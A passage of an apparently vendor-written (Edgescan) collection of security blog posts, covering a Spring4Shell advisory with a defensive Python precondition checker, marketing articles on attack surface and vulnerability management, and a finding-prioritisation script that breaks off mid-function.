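Against the constructed host, phase 1 flags the hostname, the path and the JSON content type; phase 2 finds the spec at `/openapi.json`; phase 3 reports only `GET /v1/users`, because `/v1/admin` correctly challenges for a bearer token and `/v1/health` is not marked as protected. Replacing `sample_fetch` with a real HTTP client is the only change needed to run it against a live estate.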
#### Proactive API management

Scanning tools are all the rage for enterprise ASM and VM. But despite the temptation to fixate on point scanning tools as one's Vulnerability Management (VM) solution, it does not take a huge conceptual leap to see that a VM program is easier to run effectively if rogue attack surface exposures, APIs included, are detected and shut down before incidents start to happen. Yet the industry remains highly reactive about API vulnerability management. Smart VM means having smart ASM. APIs can be the most challenging case, but with the right approach they can be managed just as proactively and effectively.

Want to learn more about best practices for External Attack Surface Management? Click Edgescan/The Evolving Attack Surface.

### Spring4Shell - CVE-2022-22965

#### Introduction

At the end of March 2022, a researcher disclosed a zero-day vulnerability in the Spring Framework core, which became known as "Spring4Shell" (CVE-2022-22965). The name suggests a close relationship to Log4Shell, but so far there appears to be no direct link beyond the naming.

As currently understood, an application is vulnerable only when all of the following conditions hold:

- The web application runs on Java Development Kit (JDK) version 9 or later.
- Apache Tomcat is running as the servlet container.
- Spring Framework version 5.2.0 to 5.2.19, or 5.3.0 to 5.3.17, is in use.
- The application is packaged and deployed as a WAR file.
- The application depends on spring-webmvc or spring-webflux from the Spring Framework.

#### What we are doing

Edgescan has rolled out a test for vulnerable versions of the affected software using our network scanners. From today, 5th April, all scheduled assessments check for the versions affected by CVE-2022-22965 and report them in customer estates as they are found. At this stage, no news is good news.
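The five conditions above can be turned into a triage check that runs over an inventory of deployments. The following is an added example, not Edgescan's scanner logic: it parses Spring version strings in the forms Maven actually emits (`5.3.17`, `5.2.19.RELEASE`, `5.3.18-SNAPSHOT`), tests each deployment against the published ranges and the other four preconditions, and lists the deployments that meet all of them. The `Deployment` record and its field names are assumptions (in practice the values come from a build manifest, a dependency report or a fingerprinted response), and the sample estate is constructed.

```python
"""Precondition check for CVE-2022-22965 (Spring4Shell) against the five published conditions.

Added example, not Edgescan's scanner logic. Deployment and its fields are assumptions;
SAMPLE_DEPLOYMENTS is a constructed estate.
"""
from dataclasses import dataclass

# Affected Spring Framework ranges from the advisory (inclusive).
# 5.2.20 and 5.3.18 are the releases that fix the issue.
AFFECTED_SPRING = (((5, 2, 0), (5, 2, 19)), ((5, 3, 0), (5, 3, 17)))
WEB_MODULES = ("spring-webmvc", "spring-webflux")


def parse_version(text: str) -> tuple:
    """'5.3.17' -> (5, 3, 17); '5.2.19.RELEASE' -> (5, 2, 19); '5.3.18-SNAPSHOT' -> (5, 3, 18)."""
    nums = []
    for part in text.replace("-", ".").split("."):
        if not part.isdigit():
            break          # stop at qualifiers such as RELEASE or SNAPSHOT
        nums.append(int(part))
    return tuple((nums + [0, 0, 0])[:3])


def spring_version_affected(text: str) -> bool:
    v = parse_version(text)
    return any(lo <= v <= hi for lo, hi in AFFECTED_SPRING)


@dataclass
class Deployment:
    name: str
    spring_version: str
    jdk_major: int
    servlet_container: str   # "tomcat", "jetty", "undertow", "embedded-tomcat", ...
    packaging: str           # "war" or "jar"
    dependencies: tuple      # artifact IDs present on the classpath


def assess(d: Deployment) -> dict:
    """Evaluate each of the five published preconditions and whether all of them hold."""
    checks = {
        "jdk9_or_later": d.jdk_major >= 9,
        "tomcat_servlet_container": d.servlet_container.lower() == "tomcat",
        "spring_version_affected": spring_version_affected(d.spring_version),
        "war_packaging": d.packaging.lower() == "war",
        "web_module_present": any(m in d.dependencies for m in WEB_MODULES),
    }
    checks["all_preconditions_met"] = all(checks.values())
    return checks


# Constructed sample estate.
SAMPLE_DEPLOYMENTS = [
    Deployment("orders", "5.3.17", 11, "tomcat", "war", ("spring-webmvc",)),
    Deployment("billing", "5.2.19.RELEASE", 8, "tomcat", "war", ("spring-webmvc",)),   # JDK 8: not the known state
    Deployment("catalog", "5.3.18", 17, "tomcat", "war", ("spring-webflux",)),           # patched release
    Deployment("search", "5.3.16", 17, "embedded-tomcat", "jar", ("spring-webmvc",)),   # fat jar, not a WAR
]


def triage(deployments) -> list:
    """Names of deployments meeting every precondition: the ones to patch first."""
    return [d.name for d in deployments if assess(d)["all_preconditions_met"]]


if __name__ == "__main__":
    for d in SAMPLE_DEPLOYMENTS:
        print(f"{d.name:10}", assess(d))
    print("patch first:", triage(SAMPLE_DEPLOYMENTS))
```

Read the result as a priority order, not a clean bill of health: the check encodes the vulnerable state known at the time, and, as the text goes on to warn, a proof of concept that needs fewer than all five components may appear. Any deployment on an affected Spring release should move to 5.3.18 or 5.2.20 (Spring Boot 2.6.6 or 2.5.12) regardless of which other boxes it ticks.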
Given how early we are in this vulnerability's lifecycle, we recommend keeping an eye on any implementation that meets some of the above conditions: a proof of concept that does not require all five components could appear in the coming weeks, so an absence of matches today should not be read as a clean bill of health.

#### Contact

Edgescan has automatically included this check in testing as of today, 5th April. If we discover it in your environment it will be shown on your Edgescan dashboard. Customers who would like to begin assessments immediately can use the scan-on-demand feature, or reach out to our support team with any further queries.

#### Spring4Shell defense with DAST

The Spring4Shell vulnerability highlights the critical need for proactive application security. Our Dynamic Application Security Testing (DAST) actively detects vulnerabilities in your web applications so that they can be mitigated. With offices in Dublin and New York, we are here to help you defend against evolving threats.

### What Exactly is an Evolving Attack Surface and Why Does it Matter?

"An evolving attack surface" is a very evocative phrase. It almost suggests a science-fiction future in which menacing aliens have the power to morph your protective barriers and leverage them for easy access to your internal, unprotected assets. For the typical enterprise Vulnerability Management (VM) team in 2022, however, this image of a morphing attack surface is not a far stretch. The interesting twist is that the evolving nature of your attack surface is not the handiwork of an external actor; it evolves as your business stands up new web-based services and ever-expanding digital transformation exercises. The evolving attack surface is generated by your enterprise's need to create new strategic routes to market and to deliver innovative, competitive services to clients. So the question is: if the enterprise creates its own attack surface exposures, why are they so difficult to manage, and why does it matter?
#### Attack surface management is hard, and it really, really matters

"Evolving" attack surfaces present a challenge. Continuous attack surface change creates the threat of new exposures. These could result from deploying new systems and servers whose control measures are not set up properly, or from a key service being inadvertently exposed. It could be something at the administration level, such as services not being configured securely, or it could simply be human error exposing unintended services during new and rapidly expanding cloud deployments. These inadvertent exposures are golden moments of opportunity for a would-be attacker.

The attack surface is incredibly wide. Just as enterprise business direction adapts on the fly to new market conditions, so do its internal and client-facing IT services. They are constantly changing. The ways in which the attack surface changes are wide and varied, and the chance of human error with every new exposure is equally mixed. Anything facing the public internet introduces potential attack surface exposure, including:

- Cloud
- Data centers
- Firewalls
- IoT devices
- Servers
- Services
- APIs

Basically, any endpoint exposed to the public internet is attackable, hence the need for vigilant Attack Surface Management (ASM).

You will always have to manage risk. For each enterprise there are types of exposure, IP addresses and web applications for example, that are intended to be exposed to the internet. Public access is specifically what they are for: an eCommerce business needs online purchases to meet its revenue goals. Out of the gate, a comprehensive Attack Surface Management (ASM) solution is required. But even traditional sectors such as government, manufacturing and agriculture are rapidly rolling out digital transformation offerings to stay competitive, which means they continue to expose more services to the internet to reach new streams of business.
While this is a calculated decision to allow new public access, it introduces an additional layer of attack surface exposure to manage.

Legacy surface management: time is not our friend. Visibility is of paramount importance in cyber security; we cannot secure what we cannot see. The longer a business allows old services to run, the larger the window of exposure. While there is no single consistent pattern or explanation, legacy services and their exposed surfaces become more vulnerable over time. Allowing old services to persist is not playing it safe; it exposes your organization to a larger window of exposure and, in most cases, completely unnecessary risk. In 2021 the average age of the exposure used to breach was one to three years (Edgescan 2022 Stats Report). Had these enterprises had a viable ASM solution, meaning they had identified and closed the avenue of attack earlier, the majority of these hacks could have been avoided.

So why does it matter? Large recent breaches have resulted from attack surfaces not being managed properly. Many recent high-profile ransomware attacks were a direct result of letting one's guard down on attack surface management. To illustrate the significance, consider the 2021 Colonial Pipeline attack, in which attackers gained entry through a legacy VPN account that was still reachable from the internet and was not protected by multi-factor authentication, and then disrupted fuel supplies across the U.S. Southeast. Poor ASM was at the root of the problem: the avenue of attack might have been closed if a high level of visibility had been in place via an ASM solution.

#### Human error means human vigilance is necessary

Human error can wreak havoc. Issues created by the simple lack of knowledge that something was deployed, a firewall that was configured incorrectly, a system missing a critical patch, and so on, recur in every enterprise.
Each of these evolving exposures requires immediate detection and an immediate business assessment to determine whether it is an unintentional issue or is aligned with intended business goals. Vigilance is not optional. You must first detect, accurately, that an unintended exposure has occurred before you can assess whether it needs to be shut down or mitigated. This need for proactive detection and management is continuous and necessary.

Want to learn more about best practices for Attack Surface Management? Click Edgescan/The Evolving Attack Surface.

### How to Make Your IT and Operations Team Security Remediation Superstars

#### Necessary links for a necessary chain

The best efforts of an enterprise IT and Operations team can be completely undone by one hacker leveraging one vulnerability at one moment in time. IT and Operations should therefore be very motivated to maintain an effective security posture continuously. But here we have a conundrum: the Operational Support and IT teams tasked with fixing vulnerabilities are not cyber security experts. So how can the Vulnerability Management (VM) team empower Ops and IT to perform effective and timely fixes? How can we make them remediation superstars?

#### Five steps to turn your IT and Operations team into remediation superstars

1. Accuracy. False positives are the Achilles heel of effective remediation. Not only do they rob the support team of precious bandwidth, they lengthen the mean time to remediation. Remove false positives before you communicate anything to your IT and Ops teams.

2. Brevity. IT and Operations already have a day job. To get effective support on what really matters, take the time to present all relevant vulnerabilities across the entire IT stack (web apps, network, devices and so on) concisely, in one single report. The faster they can understand the issue, the faster they can act on your alerts, and the faster they act, the shorter the time to fix.
3. Business ranking. Do not let the quantity of alert types dictate the prioritization of resolution requests. Rank them by business severity instead. This ensures the shortest remediation time on the issues that really matter.

4. Remediation guidance. Integrate your alerts with actual step-by-step remediation guidance. In addition, offer a direct phone line so that the team can get verbal step-by-step guidance for critical items as needed. If you see a pattern of issues, say at the code level, provide proactive guidance on cyber hygiene best practices so that those types of vulnerabilities have no chance of appearing.

5. Daily workflow integration. Do the research up front on where your IT and Operations team manages its task assignments. If it is a ticketing system, integrate your business-ranked alerts and remediation guidance into that system. If it is a bug-tracking system such as Jira, deliver your alerts there. If it is something as simple as instant messaging, use that IM system. To ensure the most efficient and timely communication, make sure your Vulnerability Management (VM) system can integrate with your support team's chosen system. The goal is to make vulnerability remediation part of their daily workflow. This both makes efficient use of your support team's limited bandwidth and has a direct impact on remediation times.

#### Alignment is key

As a precautionary measure, be proactive and remind your IT and Operational Support team that you are actively identifying vulnerabilities across the attack surface that may have real business impact, not only on operational runtime and IT service availability but on the business's bottom line. Everyone is on the same team with this common goal, and everyone should be aligned to prevent unnecessary business disruption. The key to realizing that goal is lowering remediation time on the issues that have business impact.
By taking these five steps, you can ensure that members of your wider team become remediation superstars.

Want to learn more about enabling your IT and Operations team? Click Edgescan/Does a Hybrid Model for Vulnerability Management Make Sense?

#### Empowering teams with NVM

We believe in empowering IT and operations teams to succeed. Our Network Vulnerability Management (NVM) provides actionable insights, helping your teams address risks efficiently. From Dublin to New York, we support organizations in transforming their security operations into proactive defense.

### How to Fix Security Alert Fatigue (And Yes, it is real)

#### The security alert fatigue problem is real

According to a 2020 Dimensional Research report, "56% of Large Companies Handle 1,000+ Security Alerts Each Day." Year over year the problem is getting worse: "Seventy percent said the volume of security alerts they receive on a daily basis have more than doubled in the past five years." Naturally this puts stress on security staff: "Most (93%) said they cannot address all alerts in the same day." This growth in the sheer volume of alerts, together with the staff shortages for managing them, contributes to alert fatigue, which has become widespread across enterprise security teams: "83% said staff has alert fatigue." (Dimensional Research Report 2020)

#### Five practical steps to beating alert fatigue

There is light at the end of the tunnel. Recent innovative approaches and technologies can alleviate the causes of alert fatigue at the source. Here are five practical steps you can take today.

1. Take out the false positives. The bad news is that while automated scanning tools have solved the problem of identifying vulnerabilities at scale, they have also created the alert and noise problem. Automated tools cannot rule out false positives on their own, so manual validation is still necessary.
Fortunately, there is a new breed of Vulnerability Management platform that offers integrated expert vulnerability assessment. Such platforms can deliver virtually false-positive-free alerts, preventing additional strain on your internal security staff. This hybrid model combines automation with human validation. Alert fatigue is too often accepted as the status quo, but it does not need to be. In 2022 there is no reason for any team to spend limited resources chasing false positives.

2. Aggregate your alert dashboards. While automated scanning tools have evolved, they remain siloed, IT-layer-specific point solutions, each with its own alert dashboard. It is far less efficient and more time consuming to constantly scan and analyze multiple dashboards, and it takes more effort to compile aggregated reports on your total security posture for management. Worse than consuming staff bandwidth (assuming you have adequate staff at all), this inefficiency can slow actual remediation. Again, there is no reason in 2022 to live with multiple alert dashboards and let them affect your remediation times: there are innovators that have consolidated a single dashboard of truth across each layer of the IT stack, making alert management far more efficient and lowering remediation times.

3. Contextualize. Deciphering which vulnerabilities have the largest business impact and need immediate attention can also create alert fatigue. Standards are shifting toward pre-built technologies that contextualize each alert by the business impact it may have on your organization. It is far more efficient to see the most significant risks on a single dashboard and immediately perform strategic remediation actions.

4. Closure through on-demand pentests. Another dimension of alert fatigue is validation.
When a pentest is performed and the fix for a vulnerability is validated, you want to be confident that it is in fact resolved. To achieve this, confirm that the pentesters themselves are seasoned security professionals, familiar with your business processes and with how your security posture provides resilience within the context of your operations. To reduce turnaround times and ensure continuous coverage, enterprises are moving to on-demand Penetration Testing as a Service (PTaaS) models.

5. Pivot from alert fatigue to remediation superstars. According to the 2022 Edgescan Stats Report, the mean time to remediate (fix code) a critical-risk finding at the web application/API layer is 47.6 days, and the mean time to remediate (patch/reconfigure) a critical-risk finding at the device/host layer is 61.4 days. You want to focus on fixing things, and fixing them quickly. To pivot your team from alert-fatigued soldiers to resilience enablers, shift its focus from collating and validating results to remediation. There are practical steps to achieve this. Perhaps the most important is to integrate the intelligence and remediation guidance into the workflow and support systems of your IT staff. This puts accurate guidance in the hands of the people who resolve the issues and lowers the overall remediation time. The good news is that the industry is pivoting to vulnerability tracking tools that come pre-built with integration hooks into common support systems, making this much easier.

#### In summary: the pivot from fatigued soldier to dragon slayer

As the scale of automated tooling has risen, so has the number of erroneous alerts per week. Just by acting on these five basic steps, your team can recover from alert fatigue. The difference in staff psychology will be game-changing.

Want to learn more about achieving virtually 100% false-positive-free alerts?
Click Edgescan/Does a Hybrid Model for Vulnerability Management Make Sense?

### SXSW

PAST EVENT: 11 March 2022 | Austin

One-on-one sessions provided:

- A dedicated session with an Edgescan Solution Professional
- Answers to any questions about needs within your particular environment
- Updates on the latest developments of the Edgescan Platform
- An exclusive gift from Edgescan to take home

### How To Make Your Vulnerability Alerts Virtually 100% False-Positive Free

#### An alarming status quo

For those outside the enterprise cyber security community, it can seem strange to imagine that experienced security professionals live in a world where managing the noise of false-positive alerts is a daily and significant problem. But in 2022, for almost every global enterprise, this is simply a fact. Before we think about how to resolve the issue, let us first remind ourselves why one would want to rid a Vulnerability Management (VM) program of false positives.

#### The very, very, very bad problem with false positives

Taking eyes off what matters. If you are constantly struggling with false positives, it drastically impedes your ability to catch the vulnerabilities that truly matter, the ones that could have a dramatic business impact.

Resilience menaces. Obviously exposures on your attack surface have the biggest impact on your security resilience posture, but the distraction and delay caused by false positives are too often taken for granted. The attacker will exploit an exposure while you are still sorting what is real from what is simply noise.

Confidence deflators. Your team's confidence suffers when it acts on false positives only to realize it has been sent on a fool's errand. Management and IT also lose confidence in your judgement when too many false flags are communicated as real issues.
Morale killers. The simple drudgery of weeding out false positives can on its own drain the initial strategic spirit of your team. When false positives leak into remediation and support teams chase issues that are not issues, it takes the wind out of everyone's sails.

Bandwidth siphons. With infinite time and budget, manually ruling out false positives can be done. But every enterprise has a limited budget and limited staff, and you do not want to squander the investment and time of your strategic security team on manual false-positive removal. You want your VM team focused on the prize: being proactive, and aligning security best practices and tools with your ongoing and changing business goals.

#### So how do we achieve virtually 100% false-positive-free alerts?

An interesting irony is that the sheer scale of vulnerabilities across the entire attack surface initially had to be handled with automation. The scaling capability of automated alerts for each layer of the IT stack (web applications, network and devices, APIs and so on) matched the scale of the growing vulnerability count, but it also generated a lot of noise. To remove the noise we must return to the human to rule them out. There are efficient ways to do this; here are the three steps you should take.

Number 1, alert convergence. Before you begin ruling out false positives, make the process more efficient by aggregating and contextualizing the alerts from each layer of the IT stack on one dashboard. The task is more manageable when taken on from a single source.

Number 2, contextualize the alerts. To really optimize the process, first rank all the alerts by type and business process, so that when you remove the false positives you have not only accuracy but business insight on what to act on first.
Number 3, consider a hybrid platform. If you already deploy a vulnerability solution for automated alerts, consider a hybrid version in which the supplier provides a team of experienced experts to perform false-positive removal as part of the overall solution. These hybrid solutions offer the bandwidth of seasoned security experts, allowing your VM security staff to focus on proactive and strategic activities that optimize your VM program. Given the scarcity of cyber security professionals, having a scalable set of security experts to rule out false positives is valuable; in many cases they can provide expert remediation guidance as well.

#### In summary: human security expertise is key

There is no magical automated bullet to rid oneself of the false-positive problem; there is simply no substitute for human security expertise to remove them safely. If this is ultimately what you need to do, then you need to face up to the question of how you will most efficiently achieve it: by an internal recruiting effort, by tapping existing staff within your department, or through a hybrid solution with your VM automated alert supplier. Keep in mind that false-positive removal is a continual and necessary activity. The time to start slaying the noise dragon was yesterday.

Want to learn more about achieving virtually 100% false-positive-free alerts? Click Edgescan/Does a Hybrid Model for Vulnerability Management Make Sense?

#### Making your alerts false-positive free

False positives waste time and resources, which is why we focus on accuracy. Our Dynamic Application Security Testing (DAST) minimizes false positives, helping you focus on real threats. From Dublin to New York, we provide precision-driven security solutions.
### Five Ways You Can Make Your Vulnerability Management (VM) Program Smart Now

So you are convinced that you need to adopt a "Smart" Vulnerability Management (VM) approach, but you are not quite sure how to get started or even what to aim for. Here are five very important steps you need to take to bring on the "Smart".

#### Number 1: understand business goals, then automate ranked alerts

Take a step back and think holistically about how your business runs and which business processes are most critical to achieving your enterprise goals. Talk to your business line leaders and operational staff. Hit the whiteboard and talk through "what if" scenarios. Rank all of your business concerns as they pertain to potential exposures of your attack surface. Then take on a Smart VM platform that lets you rank and automate each alert type across each IT layer, so that you receive automated, business-ranked alerts. This is all done at the set-up stage. It is necessary, but it is not sufficient; read on.

#### Number 2: make sure it is 100% accurate

Want to guarantee zero confidence from your support team when you present alerts? Send them the automated alerts with no validation and let them spend days chasing false positives. You need to get Smart about the burden of noise generated by automated alerts: adopt a platform that integrates security specialists who rule out false positives BEFORE the alerts are presented. In 2022, running your VM program virtually false-positive free is doable. VM with virtually 100% accuracy IS Smart.

#### Number 3: don't waste anyone's time; give them the whole snapshot and show them clearly what matters most

It is easy to follow the typical IT-stack, layer-by-layer specialist approach: one automated scanning tool for web applications, one tool for API scanning, one tool for network and devices, one ad hoc request for a pen test.
For the past ten years most global enterprises have taken on this layered point-solution approach and then spent mountains of time cobbling together fractured intelligence reports across the attack surface. In 2022 that is no longer acceptable, nor is it Smart VM. There are full-stack VM platforms that present your security posture in one snapshot. They are pre-built to provide a single touchstone of truth that shows your security team AND your operational support team which issues need resolving now. Can we agree to buck the point-solution tradition and take on Smart full-stack VM now?

#### Number 4: understand your operational support team's daily workflow (DO NOT INTERRUPT IT) and become part of it

The vernacular of "Smart" typically places a high emphasis on the intelligence produced, but when we run a VM program we have a higher standard: we have to make the enterprise itself resilient. We have to continuously ensure that the important vulnerabilities are remediated in a timely manner. The way to do that is to take a Smart approach to integrating with the support staff's daily workflow, and this can be as simple as asking the support team how they like to receive ticket information for seamless resolution. To achieve that seamless workflow integration in 2022 there are Smart VM platforms that integrate with whatever system your support team uses. And like the alert engine, it is all automated. It is all Smart.

#### Number 5: don't be an alert engine, be a remediation engine

Congratulations if you have completed the four steps above. Now here is a challenge. On one side you have continuous, ranked, business-intelligent alerts; on the other side you have IT operational support staff who are not security experts but who are required to remediate the issues. So how do you get security-specialist remediation guidance into the hands of the IT support staff?
The good news, once again, is that there are Smart VM platforms that integrate security-specialist validation not only to rule out false positives but to provide timely, contextualized guidance on how to resolve the pressing issue at hand. With a Smart approach, that guidance can be integrated into the ticketing system for easy access, or can be just a phone call away for verbal step-by-step remediation guidance. And you get bonus Smart points when you adopt proactive specialist guidance: when bad programming patterns are noted, best-practice guidance is deployed before a vulnerability is actually picked up.

#### Be Smart, be bold

If you take these five significant steps to Smart VM, we will allow you to walk with a bit of swagger. If you have delivered a proactive, continuous and business-intelligent remediation machine to your company, and have a resilient enterprise to show for it, your Smart VM program entitles you to bragging rights. If you don't have your Smart VM swagger yet, let's talk.

Like to learn more about why Smart VM matters? Click Read Whitepaper.

### Five Simple Ways to Know if Your Vulnerability Management Program is "Smart"

Do you think you have an optimal Vulnerability Management (VM) program set up, or perhaps you are not so sure? Well, we have the test for you. Here are five indicators you need to be able to check off before you can say your VM program is "Smart".

#### Smartness indicator #1: automation

Let's start with the most obvious Smart indicator: automating vulnerability alerts. But let's up the game. Do you have tuned, automated alerts across the entire IT stack, including web applications, network and devices, and APIs? You are not trying to manually compile those alerts into a composite view of the truth, are you? That would not be Smart.

#### Smartness indicator #2: accuracy

Of course you have accuracy; that has nothing to do with Smartness, one might say, that is Vulnerability Management 101.
But in fact the advance of automated alerts has created rapid growth in noise, that is, false positives, and a sizable part of the security team's workday is spent manually removing them. This is far from strategic VM and far from Smart. If you adopt a hybrid model in which integrated security experts ensure virtually false-positive-free alerts, then you can check this one off your list.

#### Smartness indicator #3: contextualized intelligence

Alerts on their own are dumb. Each real vulnerability discovered across each layer of the attack surface represents a potential business problem, and the actual significance of that problem depends heavily on the nature of the business and its particular business processes. At the end of the day you need a single view of which vulnerabilities matter most to your business, and you need it continuously. Reacting to what matters, to what has impact, is Smart. Automated, accurate and ranked vulnerabilities on one dashboard is super Smart. Can you check this one off your list?

#### Smartness indicator #4: continuous attack surface management

The attack surface evolves. A productive web application with public internet-facing exposure may have had its day in your marketplace. A seemingly innocent decision to mothball that service but keep it alive just in case it is needed for special cases has now made it a playground for an attacker looking for access. For the global enterprise, every day brings a myriad of evolving attack surface exposures that need to be continuously and accurately monitored. Does your current Attack Surface Management program guarantee that? Only an unqualified "yes" can check this one off your list. Flying blind is not Smart.
Smartness Indicator #5 – Operational Smartness Enablement

So, suppose you have checked all four boxes above. On one side you have accurate, business-ranked vulnerability intelligence across your entire attack surface; on the other side of the house you have an Operational Support team. They have their own day job. They are not in possession of this intelligence, nor do they have the security expertise to know how to remediate each specific issue. Remember, we are not in a spot-the-vulnerability competition. The end game is to actually resolve the issues that matter most and make your enterprise resilient. You can check this box if you have integrated ranked alerts with specific remediation guidance into the daily workflow of your Operational Support teams. If your Ops team rolls their eyes at your “Yes”, then you do not have it.

Is This Checklist Realistic in 2022?

Have we set the bar too high with this five-box Smart VM checklist? Is this even available today? In fact, these are all core features of the Edgescan Smart VM Platform, and its clients are enjoying the benefits today. Edgescan clients can easily say they are Smart. Do we need to talk?

Building Smart VM Programs with PTaaS

A smart vulnerability management program requires continuous testing and real-time insights. Our Penetration Testing as a Service (PTaaS) ensures you stay ahead by identifying and fixing vulnerabilities as they arise. With teams in Dublin and New York, we’re committed to helping you build a resilient security strategy.

### 2022 Vulnerability Stats Report Preview

How can one achieve the necessary level of insight to be informed on what really matters?
Gartner highlights the need for executives to become more agile in their vulnerability management approach, and notes the trend away from a centralized function toward a distributed, informed risk decision-making model.

Transitioning from Technical Security to Executive Risk Management

“The CISO role has moved from a technical subject matter expert to that of an executive risk manager” (Gartner Identifies Top Security and Risk Management Trends for 2022, March 2022)

“Enterprise cybersecurity needs and expectations are maturing, and executives require more agile security amidst an expanding attack surface. Thus, the scope, scale, and complexity of digital business makes it necessary to distribute cybersecurity decisions, responsibility, and accountability across the organization units and away from a centralized function.” (Gartner 2022)

Distributing Decisions – One of the Top Five Security Trends for 2022

“By 2025, a single, centralized cybersecurity function will not be agile enough to meet the needs of digital organizations. CISOs must re-conceptualize their responsibility matrix to empower Boards of Directors, CEOs, and other business leaders to make their own informed risk decisions.” (Gartner Identifies Top Security and Risk Management Trends for 2022, March 2022)

Enabling Smart Vulnerability Management Decisions – Five Important Steps

Here are five important steps to enable your enterprise vulnerability management office to become an informed executive risk decision maker.

1 - Eliminate the Noise

Automated scanners across the full stack generate a significant number of false positives. This noise obscures the data actually needed to make informed decisions. Keep your security staff focused on what matters: instead of having them manually remove false positives, use a hybrid vulnerability management platform with enterprise security experts in that role.
2 - Get a Single Picture of What Matters

Your business leadership audience does not need (or want) a separate vulnerability assessment for each layer of the attack surface. They want a single, composite view of which vulnerabilities can have an impact on their business. To be informed and decisive, they need the message to be simple and clear. Consider a vulnerability management platform that: a) integrates alerts from all layers of the full stack (from the network to web applications), and b) provides intelligence on the entire evolving attack surface, including the challenging APIs.

3 - Rank Business Risk Alerts

The limitations of CVSS are well known and well documented: a base score measures the technical severity of a flaw, not whether the affected system is exposed, whether the flaw is being exploited in the wild, or what that system means to your business. Ideally, your Smart vulnerability management platform should business-rank each vulnerability alert within the context of your organization. Smart risk management triages severe, high-impact vulnerabilities ahead of high-volume, low-risk alerts.

4 - Verify with Integrated Pen Testing

Traditional penetration testing is typically scheduled a finite number of times per year. But to make truly informed risk-based decisions, real vulnerabilities and their fixes need to be validated as they occur. An integrated on-demand pen testing service supports issue detection, remediation, and validation in one seamless, efficient vulnerability management process.

5 - Integrate Risk Communication into Your Audience’s Systems

Your vulnerability management platform may currently give you a single dashboard of vulnerability business risk exposure. But is it accessible to your business decision makers and IT support team? Real-time integration into your risk management and ticketing systems enables them to make quick and conclusive decisions daily. Fortunately, leading vulnerability management platforms now come pre-baked with integrations into most major enterprise IT and risk systems. This is not a “nice to have” convenience feature.
It is essential to positively impact remediation times. Only day-to-day workflow integration can provide actionable visibility to your IT operations staff and business leadership team.

Smart Vulnerability Management Enables Informed Risk Management Decisions

Informed risk managers use a single touchstone of prioritized, high-risk alerts, free of false positives, across the entire attack surface. Ideally, this touchstone is integrated into the daily workflow of Security, Business Leadership, and IT functions. While Gartner expects that by 2025 a single centralized security function will no longer be agile enough, it is imperative that leaders in this most relevant field do not fall behind. Taking these five steps to enable informed risk management decisions should be a priority in 2022.

Read the latest Edgescan Vulnerability Management Statistics Report

### Five Reasons You Need to Embrace “Smart” Vulnerability Management Today

You may have taken the initial steps and deployed automated scanning tools for your Vulnerability Management (VM) program, only to find that they generate a lot of noise and offer neither business context nor remediation guidance. Furthermore, the overhead of administering these tools robs your security team of the bandwidth it needs to actually resolve real issues. In short, your VM program is far from “Smart”. Here are five big reasons why you need to embrace a Smart approach for your VM program:

Reason 1 – Contextualized Accurate Insight

A Smart approach delivers both accuracy and context. Accuracy is ensured by the hybrid model, in which security experts validate every alert to achieve virtually 100% false-positive-free intelligence. Contextualized intelligence is delivered by rating the severity of each type of vulnerability against your business processes and integrating automated, ranked alerts into your single dashboard. The Smart approach delivers accurate results and prioritizes what needs attention first.
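Steps 2, 3 and 5 of the previous article and Reason 1 here describe one pipeline: drop what the analysts ruled out, merge the same finding when several engines report it, rank the rest by business context rather than raw CVSS, and hand the result to the ticketing system. The Python below is an added illustration of that pipeline written for this page; it is not Edgescan code and does not reproduce its EVSS or Exposure Factor scoring. The weights, the asset inventory, the findings from the two hypothetical engines ("nvm" and "dast") and the ticket schema are all constructed for the example.

```python
from typing import Dict, List

# Constructed asset inventory: the business context the scanners themselves do not know.
ASSET_CONTEXT: Dict[str, Dict] = {
    "payments.example.com": {"exposure": "internet", "criticality": 3},
    "build-agent-03.corp.internal": {"exposure": "internal", "criticality": 1},
    "intranet-wiki.corp.internal": {"exposure": "internal", "criticality": 1},
}
# An asset nobody has inventoried is treated as exposed until proven otherwise.
UNKNOWN_CONTEXT = {"exposure": "internet", "criticality": 2}

# Assumed weights for this example: internal-only exposure halves the score.
EXPOSURE_WEIGHT = {"internet": 1.0, "partner": 0.8, "internal": 0.5}

# Constructed findings from two hypothetical engines feeding one platform.
# "status" is the analyst verdict; "kev"/"epss" are sample values, not live feed data.
SAMPLE_FINDINGS: List[Dict] = [
    {"tool": "nvm", "asset": "payments.example.com", "title": "Log4Shell (CVE-2021-44228)",
     "cvss": 10.0, "kev": True, "epss": 0.97, "status": "confirmed"},
    {"tool": "dast", "asset": "payments.example.com", "title": "Log4Shell (CVE-2021-44228)",
     "cvss": 9.8, "kev": True, "epss": 0.97, "status": "confirmed"},        # same issue, second engine
    {"tool": "dast", "asset": "payments.example.com", "title": "Authentication bypass on customer login",
     "cvss": 8.1, "kev": False, "epss": 0.2, "status": "confirmed"},
    {"tool": "dast", "asset": "payments.example.com", "title": "SQL injection in search form",
     "cvss": 9.8, "kev": False, "epss": 0.5, "status": "false_positive"},  # analyst ruled it out
    {"tool": "nvm", "asset": "build-agent-03.corp.internal", "title": "Remote code execution in legacy admin console",
     "cvss": 9.8, "kev": False, "epss": 0.02, "status": "confirmed"},
    {"tool": "nvm", "asset": "intranet-wiki.corp.internal", "title": "Missing HTTP security headers",
     "cvss": 3.1, "kev": False, "epss": 0.0, "status": "confirmed"},
]


def consolidate(findings: List[Dict]) -> List[Dict]:
    """Drop analyst-rejected alerts and merge duplicates reported by several tools."""
    merged: Dict[tuple, Dict] = {}
    for f in findings:
        if f["status"] != "confirmed":
            continue
        key = (f["asset"], f["title"])
        m = merged.get(key)
        if m is None:
            m = {k: v for k, v in f.items() if k != "tool"}
            m["tools"] = set()
            merged[key] = m
        m["tools"].add(f["tool"])
        m["cvss"] = max(m["cvss"], f["cvss"])     # keep the most pessimistic engine
        m["kev"] = m["kev"] or f["kev"]
        m["epss"] = max(m["epss"], f["epss"])
    return list(merged.values())


def business_score(finding: Dict) -> float:
    """CVSS adjusted by exposure, asset criticality and exploitation evidence (assumed formula)."""
    ctx = ASSET_CONTEXT.get(finding["asset"], UNKNOWN_CONTEXT)
    score = finding["cvss"] * EXPOSURE_WEIGHT[ctx["exposure"]]
    score *= 1 + 0.25 * (ctx["criticality"] - 1)          # criticality 1..3 -> x1.0 .. x1.5
    score *= 1.5 if finding["kev"] else 1 + finding["epss"]  # known-exploited beats a probability
    return round(score, 2)


def prioritise(findings: List[Dict]) -> List[Dict]:
    """Single ranked list across all engines, highest business risk first."""
    ranked = []
    for f in consolidate(findings):
        f["score"] = business_score(f)
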